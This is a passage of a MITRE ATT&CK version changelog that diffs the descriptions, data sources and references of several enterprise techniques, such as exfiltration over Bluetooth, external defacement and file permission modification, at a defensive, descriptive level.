 >t with higher permissions, such as SYSTEM or service account
 >s, an adversary may be able to abuse these triggered executi
 >on mechanisms to escalate their privileges. 

New Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-10-16 20:11:14.193000+00:002022-10-19 15:44:20.456000+00:00
descriptionAdversaries may establish persistence and/or elevate privileges using system mechanisms that trigger execution based on specific events. Various operating systems have means to monitor and subscribe to events such as logons or other user activity such as running specific applications/binaries. Adversaries may abuse these mechanisms as a means of maintaining persistent access to a victim via repeatedly executing malicious code. After gaining access to a victim system, adversaries may create/modify event triggers to point to malicious content that will be executed whenever the event trigger is invoked.(Citation: FireEye WMI 2015)(Citation: Malware Persistence on OS X)(Citation: amnesia malware) Since the execution can be proxied by an account with higher permissions, such as SYSTEM or service accounts, an adversary may be able to abuse these triggered execution mechanisms to escalate their privileges. Adversaries may establish persistence and/or elevate privileges using system mechanisms that trigger execution based on specific events. Various operating systems have means to monitor and subscribe to events such as logons or other user activity such as running specific applications/binaries. Cloud environments may also support various functions and services that monitor and can be invoked in response to specific cloud events.(Citation: Backdooring an AWS account)(Citation: Varonis Power Automate Data Exfiltration)(Citation: Microsoft DART Case Report 001) Adversaries may abuse these mechanisms as a means of maintaining persistent access to a victim via repeatedly executing malicious code. After gaining access to a victim system, adversaries may create/modify event triggers to point to malicious content that will be executed whenever the event trigger is invoked.(Citation: FireEye WMI 2015)(Citation: Malware Persistence on OS X)(Citation: amnesia malware) Since the execution can be proxied by an account with higher permissions, such as SYSTEM or service accounts, an adversary may be able to abuse these triggered execution mechanisms to escalate their privileges.
external_references[2]['source_name']Malware Persistence on OS XMicrosoft DART Case Report 001
external_references[2]['description']Patrick Wardle. (2015). Malware Persistence on OS X Yosemite. Retrieved July 10, 2017.Berk Veral. (2020, March 9). Real-life cybercrime stories from DART, the Microsoft Detection and Response Team. Retrieved May 27, 2022.
external_references[2]['url']https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdfhttps://www.microsoft.com/security/blog/2020/03/09/real-life-cybercrime-stories-dart-microsoft-detection-and-response-team
x_mitre_data_sources[0]Process: Process CreationWMI: WMI Creation
x_mitre_data_sources[1]Windows Registry: Windows Registry Key ModificationModule: Module Load
x_mitre_data_sources[2]Command: Command ExecutionCloud Service: Cloud Service Modification
x_mitre_data_sources[3]File: File CreationCommand: Command Execution
x_mitre_data_sources[5]WMI: WMI CreationWindows Registry: Windows Registry Key Modification
x_mitre_data_sources[6]File: File MetadataProcess: Process Creation
x_mitre_data_sources[7]Module: Module LoadFile: File Creation
x_mitre_version1.11.2
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Backdooring an AWS account', 'description': 'Daniel Grzelak. (2016, July 9). Backdooring an AWS account. Retrieved May 27, 2022.', 'url': 'https://medium.com/daniel-grzelak/backdooring-an-aws-account-da007d36f8f9'}
external_references{'source_name': 'Varonis Power Automate Data Exfiltration', 'description': 'Eric Saraga. (2022, February 2). Using Power Automate for Covert Data Exfiltration in Microsoft 365. Retrieved May 27, 2022.', 'url': 'https://www.varonis.com/blog/power-automate-data-exfiltration'}
external_references{'source_name': 'Malware Persistence on OS X', 'description': 'Patrick Wardle. (2015). Malware Persistence on OS X Yosemite. Retrieved July 10, 2017.', 'url': 'https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf'}
x_mitre_data_sourcesFile: File Metadata
x_mitre_platformsSaaS
x_mitre_platformsIaaS
x_mitre_platformsOffice 365

[T1011.001] Exfiltration Over Other Network Medium: Exfiltration Over Bluetooth

Current version: 1.1

Version changed from: 1.0 → 1.1


Old Description
New Description
t1Adversaries may attempt to exfiltrate data over Bluetooth rat1Adversaries may attempt to exfiltrate data over Bluetooth ra
>ther than the command and control channel. If the command an>ther than the command and control channel. If the command an
>d control network is a wired Internet connection, an attacke>d control network is a wired Internet connection, an adversa
>r may opt to exfiltrate data using a Bluetooth communication>ry may opt to exfiltrate data using a Bluetooth communicatio
> channel.  Adversaries may choose to do this if they have su>n channel.  Adversaries may choose to do this if they have s
>fficient access and proximity. Bluetooth connections might n>ufficient access and proximity. Bluetooth connections might 
>ot be secured or defended as well as the primary Internet-co>not be secured or defended as well as the primary Internet-c
>nnected channel because it is not routed through the same en>onnected channel because it is not routed through the same e
>terprise network.>nterprise network.
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2020-03-28 00:34:55.439000+00:002022-03-08 21:02:15.802000+00:00
descriptionAdversaries may attempt to exfiltrate data over Bluetooth rather than the command and control channel. If the command and control network is a wired Internet connection, an attacker may opt to exfiltrate data using a Bluetooth communication channel. Adversaries may choose to do this if they have sufficient access and proximity. Bluetooth connections might not be secured or defended as well as the primary Internet-connected channel because it is not routed through the same enterprise network.Adversaries may attempt to exfiltrate data over Bluetooth rather than the command and control channel. If the command and control network is a wired Internet connection, an adversary may opt to exfiltrate data using a Bluetooth communication channel. Adversaries may choose to do this if they have sufficient access and proximity. Bluetooth connections might not be secured or defended as well as the primary Internet-connected channel because it is not routed through the same enterprise network.
x_mitre_data_sources[0]Network Traffic: Network Connection CreationFile: File Access
x_mitre_data_sources[1]Network Traffic: Network Traffic FlowNetwork Traffic: Network Connection Creation
x_mitre_data_sources[3]File: File AccessNetwork Traffic: Network Traffic Flow
x_mitre_version1.01.1

[T1567] Exfiltration Over Web Service

Current version: 1.2

Version changed from: 1.1 → 1.2

New Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_network_requirementsTrue
values_changed
STIX FieldOld valueNew Value
modified2021-10-15 22:50:29.607000+00:002022-10-19 21:28:34.699000+00:00
x_mitre_data_sources[0]Network Traffic: Network Traffic FlowCommand: Command Execution
x_mitre_data_sources[1]Network Traffic: Network Traffic ContentFile: File Access
x_mitre_data_sources[2]File: File AccessNetwork Traffic: Network Traffic Content
x_mitre_data_sources[3]Command: Command ExecutionNetwork Traffic: Network Traffic Flow
x_mitre_version1.11.2
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_data_sourcesNetwork Traffic: Network Connection Creation

[T1567.002] Exfiltration Over Web Service: Exfiltration to Cloud Storage

Current version: 1.1

Version changed from: 1.0 → 1.1

New Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_network_requirementsTrue
values_changed
STIX FieldOld valueNew Value
modified2020-03-28 01:02:24.172000+00:002022-08-30 12:49:02.969000+00:00
x_mitre_data_sources[0]Network Traffic: Network Traffic FlowCommand: Command Execution
x_mitre_data_sources[2]File: File AccessNetwork Traffic: Network Traffic Flow
x_mitre_data_sources[3]Command: Command ExecutionFile: File Access
x_mitre_version1.01.1
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_data_sourcesNetwork Traffic: Network Connection Creation

[T1068] Exploitation for Privilege Escalation

Current version: 1.4

Version changed from: 1.3 → 1.4

New Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-04-22 16:13:34.896000+00:002022-06-16 19:25:12.835000+00:00
external_references[2]['source_name']Unit42 AcidBox June 2020Microsoft Driver Block Rules
external_references[2]['description']Reichel, D. and Idrizovic, E. (2020, June 17). AcidBox: Rare Malware Repurposing Turla Group Exploit Targeted Russian Organizations. Retrieved March 16, 2021.Microsoft. (2020, October 15). Microsoft recommended driver block rules. Retrieved March 16, 2021.
external_references[2]['url']https://unit42.paloaltonetworks.com/acidbox-rare-malware/https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules
external_references[3]['source_name']Microsoft Driver Block RulesUnit42 AcidBox June 2020
external_references[3]['description']Microsoft. (2020, October 15). Microsoft recommended driver block rules. Retrieved March 16, 2021.Reichel, D. and Idrizovic, E. (2020, June 17). AcidBox: Rare Malware Repurposing Turla Group Exploit Targeted Russian Organizations. Retrieved March 16, 2021.
external_references[3]['url']https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-ruleshttps://unit42.paloaltonetworks.com/acidbox-rare-malware/
x_mitre_version1.31.4
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_contributorsDavid Tayouri
x_mitre_data_sourcesProcess: Process Creation

[T1491.002] Defacement: External Defacement

Current version: 1.2

Version changed from: 1.1 → 1.2


Old Description
New Description
t1An adversary may deface systems external to an organization t1An adversary may deface systems external to an organization 
>in an attempt to deliver messaging, intimidate, or otherwise>in an attempt to deliver messaging, intimidate, or otherwise
> mislead an organization or users. Externally-facing website> mislead an organization or users. [External Defacement](htt
>s are a common victim of defacement; often targeted by adver>ps://attack.mitre.org/techniques/T1491/002) may ultimately c
>sary and hacktivist groups in order to push a political mess>ause users to distrust the systems and to question/discredit
>age or spread propaganda.(Citation: FireEye Cyber Threats to> the system’s integrity. Externally-facing websites are a co
> Media Industries)(Citation: Kevin Mandia Statement to US Se>mmon victim of defacement; often targeted by adversary and h
>nate Committee on Intelligence)(Citation: Anonymous Hackers >acktivist groups in order to push a political message or spr
>Deface Russian Govt Site) [External Defacement](https://atta>ead propaganda.(Citation: FireEye Cyber Threats to Media Ind
>ck.mitre.org/techniques/T1491/002) may be used as a catalyst>ustries)(Citation: Kevin Mandia Statement to US Senate Commi
> to trigger events, or as a response to actions taken by an >ttee on Intelligence)(Citation: Anonymous Hackers Deface Rus
>organization or government. Similarly, website defacement ma>sian Govt Site) [External Defacement](https://attack.mitre.o
>y also be used as setup, or a precursor, for future attacks >rg/techniques/T1491/002) may be used as a catalyst to trigge
>such as [Drive-by Compromise](https://attack.mitre.org/techn>r events, or as a response to actions taken by an organizati
>iques/T1189).(Citation: Trend Micro Deep Dive Into Defacemen>on or government. Similarly, website defacement may also be 
>t)>used as setup, or a precursor, for future attacks such as [D
 >rive-by Compromise](https://attack.mitre.org/techniques/T118
 >9).(Citation: Trend Micro Deep Dive Into Defacement)
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-03-08 10:33:01.745000+00:002022-03-25 19:34:37.539000+00:00
descriptionAn adversary may deface systems external to an organization in an attempt to deliver messaging, intimidate, or otherwise mislead an organization or users. Externally-facing websites are a common victim of defacement; often targeted by adversary and hacktivist groups in order to push a political message or spread propaganda.(Citation: FireEye Cyber Threats to Media Industries)(Citation: Kevin Mandia Statement to US Senate Committee on Intelligence)(Citation: Anonymous Hackers Deface Russian Govt Site) [External Defacement](https://attack.mitre.org/techniques/T1491/002) may be used as a catalyst to trigger events, or as a response to actions taken by an organization or government. Similarly, website defacement may also be used as setup, or a precursor, for future attacks such as [Drive-by Compromise](https://attack.mitre.org/techniques/T1189).(Citation: Trend Micro Deep Dive Into Defacement)An adversary may deface systems external to an organization in an attempt to deliver messaging, intimidate, or otherwise mislead an organization or users. [External Defacement](https://attack.mitre.org/techniques/T1491/002) may ultimately cause users to distrust the systems and to question/discredit the system’s integrity. Externally-facing websites are a common victim of defacement; often targeted by adversary and hacktivist groups in order to push a political message or spread propaganda.(Citation: FireEye Cyber Threats to Media Industries)(Citation: Kevin Mandia Statement to US Senate Committee on Intelligence)(Citation: Anonymous Hackers Deface Russian Govt Site) [External Defacement](https://attack.mitre.org/techniques/T1491/002) may be used as a catalyst to trigger events, or as a response to actions taken by an organization or government. Similarly, website defacement may also be used as setup, or a precursor, for future attacks such as [Drive-by Compromise](https://attack.mitre.org/techniques/T1189).(Citation: Trend Micro Deep Dive Into Defacement)
x_mitre_version1.11.2
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_data_sourcesFile: File Creation
iterable_item_removed
STIX FieldOld valueNew Value
x_mitre_data_sourcesFile: File Creation

[T1133] External Remote Services

Current version: 2.4

Version changed from: 2.3 → 2.4

New Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
external_referencesAdair, S. (2015, October 7). Virtual Private Keylogging: Cisco Web VPNs Leveraged for Access and Persistence. Retrieved March 20, 2017.
external_referencesCAPEC-555
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_permissions_required['User']
external_referencesCAPEC-555
external_referencesChen, J. et al. (2021, February 3). Hildegard: New TeamTNT Cryptojacking Malware Targeting Kubernetes. Retrieved April 5, 2021.
values_changed
STIX FieldOld valueNew Value
modified2021-08-19 16:57:27.209000+00:002022-06-16 19:15:22.221000+00:00
external_references[1]['source_name']capecVolexity Virtual Private Keylogging
external_references[1]['url']https://capec.mitre.org/data/definitions/555.htmlhttps://www.volexity.com/blog/2015/10/07/virtual-private-keylogging-cisco-web-vpns-leveraged-for-access-and-persistence/
external_references[3]['source_name']Volexity Virtual Private KeyloggingUnit 42 Hildegard Malware
external_references[3]['description']Adair, S. (2015, October 7). Virtual Private Keylogging: Cisco Web VPNs Leveraged for Access and Persistence. Retrieved March 20, 2017.Chen, J. et al. (2021, February 3). Hildegard: New TeamTNT Cryptojacking Malware Targeting Kubernetes. Retrieved April 5, 2021.
external_references[3]['url']https://www.volexity.com/blog/2015/10/07/virtual-private-keylogging-cisco-web-vpns-leveraged-for-access-and-persistence/https://unit42.paloaltonetworks.com/hildegard-malware-teamtnt/
external_references[5]['source_name']Unit 42 Hildegard Malwarecapec
external_references[5]['url']https://unit42.paloaltonetworks.com/hildegard-malware-teamtnt/https://capec.mitre.org/data/definitions/555.html
x_mitre_version2.32.4
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_contributorsDavid Tayouri
x_mitre_data_sourcesNetwork Traffic: Network Traffic Content
x_mitre_data_sourcesNetwork Traffic: Network Connection Creation

[T1070.004] Indicator Removal: File Deletion

Current version: 1.1

Version changed from: 1.0 → 1.1


Old Description
New Description
t1Adversaries may delete files left behind by the actions of tt1Adversaries may delete files left behind by the actions of t
>heir intrusion activity. Malware, tools, or other non-native>heir intrusion activity. Malware, tools, or other non-native
> files dropped or created on a system by an adversary may le> files dropped or created on a system by an adversary (ex: [
>ave traces to indicate to what was done within a network and>Ingress Tool Transfer](https://attack.mitre.org/techniques/T
> how. Removal of these files can occur during an intrusion, >1105)) may leave traces to indicate to what was done within 
>or as part of a post-intrusion process to minimize the adver>a network and how. Removal of these files can occur during a
>sary's footprint.  There are tools available from the host o>n intrusion, or as part of a post-intrusion process to minim
>perating system to perform cleanup, but adversaries may use >ize the adversary's footprint.  There are tools available fr
>other tools as well. Examples include native [cmd](https://a>om the host operating system to perform cleanup, but adversa
>ttack.mitre.org/software/S0106) functions such as DEL, secur>ries may use other tools as well.(Citation: Microsoft SDelet
>e deletion tools such as Windows Sysinternals SDelete, or ot>e July 2016) Examples of built-in [Command and Scripting Int
>her third-party file deletion tools. (Citation: Trend Micro >erpreter](https://attack.mitre.org/techniques/T1059) functio
>APT Attack Tools)>ns include <code>del</code> on Windows and <code>rm</code> o
 >r <code>unlink</code> on Linux and macOS.
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_permissions_required['User']
values_changed
STIX FieldOld valueNew Value
modified2020-03-29 21:34:16.209000+00:002022-04-16 18:25:43.231000+00:00
descriptionAdversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint. There are tools available from the host operating system to perform cleanup, but adversaries may use other tools as well. Examples include native [cmd](https://attack.mitre.org/software/S0106) functions such as DEL, secure deletion tools such as Windows Sysinternals SDelete, or other third-party file deletion tools. (Citation: Trend Micro APT Attack Tools)Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105)) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint. There are tools available from the host operating system to perform cleanup, but adversaries may use other tools as well.(Citation: Microsoft SDelete July 2016) Examples of built-in [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) functions include del on Windows and rm or unlink on Linux and macOS.
external_references[1]['source_name']Trend Micro APT Attack ToolsMicrosoft SDelete July 2016
external_references[1]['description']Wilhoit, K. (2013, March 4). In-Depth Look: APT Attack Tools of the Trade. Retrieved December 2, 2015.Russinovich, M. (2016, July 4). SDelete v2.0. Retrieved February 8, 2018.
external_references[1]['url']http://blog.trendmicro.com/trendlabs-security-intelligence/in-depth-look-apt-attack-tools-of-the-trade/https://docs.microsoft.com/en-us/sysinternals/downloads/sdelete
x_mitre_data_sources[0]File: File DeletionCommand: Command Execution
x_mitre_data_sources[1]Command: Command ExecutionFile: File Deletion
x_mitre_version1.01.1

[T1222] File and Directory Permissions Modification

Current version: 2.2

Version changed from: 2.1 → 2.2


Old Description
New Description
t1Adversaries may modify file or directory permissions/attribut1Adversaries may modify file or directory permissions/attribu
>tes to evade access control lists (ACLs) and access protecte>tes to evade access control lists (ACLs) and access protecte
>d files.(Citation: Hybrid Analysis Icacls1 June 2018)(Citati>d files.(Citation: Hybrid Analysis Icacls1 June 2018)(Citati
>on: Hybrid Analysis Icacls2 May 2018) File and directory per>on: Hybrid Analysis Icacls2 May 2018) File and directory per
>missions are commonly managed by ACLs configured by the file>missions are commonly managed by ACLs configured by the file
> or directory owner, or users with the appropriate permissio> or directory owner, or users with the appropriate permissio
>ns. File and directory ACL implementations vary by platform,>ns. File and directory ACL implementations vary by platform,
> but generally explicitly designate which users or groups ca> but generally explicitly designate which users or groups ca
>n perform which actions (read, write, execute, etc.).  Modif>n perform which actions (read, write, execute, etc.).  Modif
>ications may include changing specific access rights, which >ications may include changing specific access rights, which 
>may require taking ownership of a file or directory and/or e>may require taking ownership of a file or directory and/or e
>levated permissions depending on the file or directory’s exi>levated permissions depending on the file or directory’s exi
>sting permissions. This may enable malicious activity such a>sting permissions. This may enable malicious activity such a
>s modifying, replacing, or deleting specific files or direct>s modifying, replacing, or deleting specific files or direct
>ories. Specific file and directory modifications may be a re>ories. Specific file and directory modifications may be a re
>quired step for many techniques, such as establishing Persis>quired step for many techniques, such as establishing Persis
>tence via [Accessibility Features](https://attack.mitre.org/>tence via [Accessibility Features](https://attack.mitre.org/
>techniques/T1546/008), [Boot or Logon Initialization Scripts>techniques/T1546/008), [Boot or Logon Initialization Scripts
>](https://attack.mitre.org/techniques/T1037), [Unix Shell Co>](https://attack.mitre.org/techniques/T1037), [Unix Shell Co
>nfiguration Modification](https://attack.mitre.org/technique>nfiguration Modification](https://attack.mitre.org/technique
>s/T1546/004), or tainting/hijacking other instrumental binar>s/T1546/004), or tainting/hijacking other instrumental binar
>y/configuration files via [Hijack Execution Flow](https://at>y/configuration files via [Hijack Execution Flow](https://at
>tack.mitre.org/techniques/T1574).>tack.mitre.org/techniques/T1574).  Adversaries may also chan
 >ge permissions of symbolic links. For example, malware (part
 >icularly ransomware) may modify symbolic links and associate
 >d settings to enable access to files from local shortcuts wi
 >th remote paths.(Citation: new_rust_based_ransomware)(Citati
 >on: bad_luck_blackcat)(Citation: falconoverwatch_blackcat_at
 >tack)(Citation: blackmatter_blackcat)(Citation: fsutil_behav
 >ior) 
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_permissions_required['User', 'Administrator', 'SYSTEM', 'root']
values_changed
STIX FieldOld valueNew Value
modified2021-09-13 21:08:10.406000+00:002022-10-19 17:54:06.038000+00:00
descriptionAdversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.(Citation: Hybrid Analysis Icacls1 June 2018)(Citation: Hybrid Analysis Icacls2 May 2018) File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.). Modifications may include changing specific access rights, which may require taking ownership of a file or directory and/or elevated permissions depending on the file or directory’s existing permissions. This may enable malicious activity such as modifying, replacing, or deleting specific files or directories. Specific file and directory modifications may be a required step for many techniques, such as establishing Persistence via [Accessibility Features](https://attack.mitre.org/techniques/T1546/008), [Boot or Logon Initialization Scripts](https://attack.mitre.org/techniques/T1037), [Unix Shell Configuration Modification](https://attack.mitre.org/techniques/T1546/004), or tainting/hijacking other instrumental binary/configuration files via [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574).Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.(Citation: Hybrid Analysis Icacls1 June 2018)(Citation: Hybrid Analysis Icacls2 May 2018) File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.). Modifications may include changing specific access rights, which may require taking ownership of a file or directory and/or elevated permissions depending on the file or directory’s existing permissions. This may enable malicious activity such as modifying, replacing, or deleting specific files or directories. Specific file and directory modifications may be a required step for many techniques, such as establishing Persistence via [Accessibility Features](https://attack.mitre.org/techniques/T1546/008), [Boot or Logon Initialization Scripts](https://attack.mitre.org/techniques/T1037), [Unix Shell Configuration Modification](https://attack.mitre.org/techniques/T1546/004), or tainting/hijacking other instrumental binary/configuration files via [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574). Adversaries may also change permissions of symbolic links. For example, malware (particularly ransomware) may modify symbolic links and associated settings to enable access to files from local shortcuts with remote paths.(Citation: new_rust_based_ransomware)(Citation: bad_luck_blackcat)(Citation: falconoverwatch_blackcat_attack)(Citation: blackmatter_blackcat)(Citation: fsutil_behavior)
external_references[1]['source_name']Hybrid Analysis Icacls1 June 2018falconoverwatch_blackcat_attack
external_references[1]['description']Hybrid Analysis. (2018, June 12). c9b65b764985dfd7a11d3faf599c56b8.exe. Retrieved August 19, 2018.Falcon OverWatch Team. (2022, March 23). Falcon OverWatch Threat Hunting Contributes to Seamless Protection Against Novel BlackCat Attack. Retrieved May 5, 2022.
external_references[1]['url']https://www.hybrid-analysis.com/sample/ef0d2628823e8e0a0de3b08b8eacaf41cf284c086a948bdfd67f4e4373c14e4d?environmentId=100https://www.crowdstrike.com/blog/falcon-overwatch-contributes-to-blackcat-protection/
external_references[2]['source_name']Hybrid Analysis Icacls2 May 2018Hybrid Analysis Icacls1 June 2018
external_references[2]['description']Hybrid Analysis. (2018, May 30). 2a8efbfadd798f6111340f7c1c956bee.dll. Retrieved August 19, 2018.Hybrid Analysis. (2018, June 12). c9b65b764985dfd7a11d3faf599c56b8.exe. Retrieved August 19, 2018.
external_references[2]['url']https://www.hybrid-analysis.com/sample/22dab012c3e20e3d9291bce14a2bfc448036d3b966c6e78167f4626f5f9e38d6?environmentId=110https://www.hybrid-analysis.com/sample/ef0d2628823e8e0a0de3b08b8eacaf41cf284c086a948bdfd67f4e4373c14e4d?environmentId=100
external_references[3]['source_name']EventTracker File Permissions Feb 2014Hybrid Analysis Icacls2 May 2018
external_references[3]['description']Netsurion. (2014, February 19). Monitoring File Permission Changes with the Windows Security Log. Retrieved August 19, 2018.Hybrid Analysis. (2018, May 30). 2a8efbfadd798f6111340f7c1c956bee.dll. Retrieved August 19, 2018.
external_references[3]['url']https://www.eventtracker.com/tech-articles/monitoring-file-permission-changes-windows-security-log/https://www.hybrid-analysis.com/sample/22dab012c3e20e3d9291bce14a2bfc448036d3b966c6e78167f4626f5f9e38d6?environmentId=110
x_mitre_version2.12.2
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'bad_luck_blackcat', 'description': 'Kaspersky Global Research & Analysis Team (GReAT). (2022). A Bad Luck BlackCat. Retrieved May 5, 2022.', 'url': 'https://go.kaspersky.com/rs/802-IJN-240/images/TR_BlackCat_Report.pdf'}
external_references{'source_name': 'fsutil_behavior', 'description': 'Microsoft. (2021, September 27). fsutil behavior. Retrieved January 14, 2022.', 'url': 'https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/fsutil-behavior'}
external_references{'source_name': 'EventTracker File Permissions Feb 2014', 'description': 'Netsurion. (2014, February 19). Monitoring File Permission Changes with the Windows Security Log. Retrieved August 19, 2018.', 'url': 'https://www.eventtracker.com/tech-articles/monitoring-file-permission-changes-windows-security-log/'}
external_references{'source_name': 'blackmatter_blackcat', 'description': 'Pereira, T. Huey, C. (2022, March 17). From BlackMatter to BlackCat: Analyzing two attacks from one affiliate. Retrieved May 5, 2022.', 'url': 'https://blog.talosintelligence.com/2022/03/from-blackmatter-to-blackcat-analyzing.html'}
external_references{'source_name': 'new_rust_based_ransomware', 'description': 'Symantec Threat Hunter Team. (2021, December 16). Noberus: Technical Analysis Shows Sophistication of New Rust-based Ransomware. Retrieved January 14, 2022.', 'url': 'https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/noberus-blackcat-alphv-rust-ransomware'}

[T1056.002] Input Capture: GUI Input Capture

Current version: 1.2

Version changed from: 1.1 → 1.2


Old Description
New Description
t1Adversaries may mimic common operating system GUI componentst1Adversaries may mimic common operating system GUI components
> to prompt users for credentials with a seemingly legitimate> to prompt users for credentials with a seemingly legitimate
> prompt. When programs are executed that need additional pri> prompt. When programs are executed that need additional pri
>vileges than are present in the current user context, it is >vileges than are present in the current user context, it is 
>common for the operating system to prompt the user for prope>common for the operating system to prompt the user for prope
>r credentials to authorize the elevated privileges for the t>r credentials to authorize the elevated privileges for the t
>ask (ex: [Bypass User Account Control](https://attack.mitre.>ask (ex: [Bypass User Account Control](https://attack.mitre.
>org/techniques/T1548/002)).  Adversaries may mimic this func>org/techniques/T1548/002)).  Adversaries may mimic this func
>tionality to prompt users for credentials with a seemingly l>tionality to prompt users for credentials with a seemingly l
>egitimate prompt for a number of reasons that mimic normal u>egitimate prompt for a number of reasons that mimic normal u
>sage, such as a fake installer requiring additional access o>sage, such as a fake installer requiring additional access o
>r a fake malware removal suite.(Citation: OSX Malware Exploi>r a fake malware removal suite.(Citation: OSX Malware Exploi
>ts MacKeeper) This type of prompt can be used to collect cre>ts MacKeeper) This type of prompt can be used to collect cre
>dentials via various languages such as [AppleScript](https:/>dentials via various languages such as [AppleScript](https:/
>/attack.mitre.org/techniques/T1059/002)(Citation: LogRhythm >/attack.mitre.org/techniques/T1059/002)(Citation: LogRhythm 
>Do You Trust Oct 2014)(Citation: OSX Keydnap malware)(Citati>Do You Trust Oct 2014)(Citation: OSX Keydnap malware)(Citati
>on: Spoofing credential dialogs) and [PowerShell](https://at>on: Spoofing credential dialogs) and [PowerShell](https://at
>tack.mitre.org/techniques/T1059/001).(Citation: LogRhythm Do>tack.mitre.org/techniques/T1059/001).(Citation: LogRhythm Do
> You Trust Oct 2014)(Citation: Enigma Phishing for Credentia> You Trust Oct 2014)(Citation: Enigma Phishing for Credentia
>ls Jan 2015)(Citation: Spoofing credential dialogs) On Linux>ls Jan 2015)(Citation: Spoofing credential dialogs) On Linux
> systems attackers may launch dialog boxes prompting users f> systems adversaries may launch dialog boxes prompting users
>or credentials from malicious shell scripts or the command l> for credentials from malicious shell scripts or the command
>ine (i.e. [Unix Shell](https://attack.mitre.org/techniques/T> line (i.e. [Unix Shell](https://attack.mitre.org/techniques
>1059/004)).(Citation: Spoofing credential dialogs) >/T1059/004)).(Citation: Spoofing credential dialogs) 
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-08-24 18:21:07.926000+00:002022-03-08 21:05:20.136000+00:00
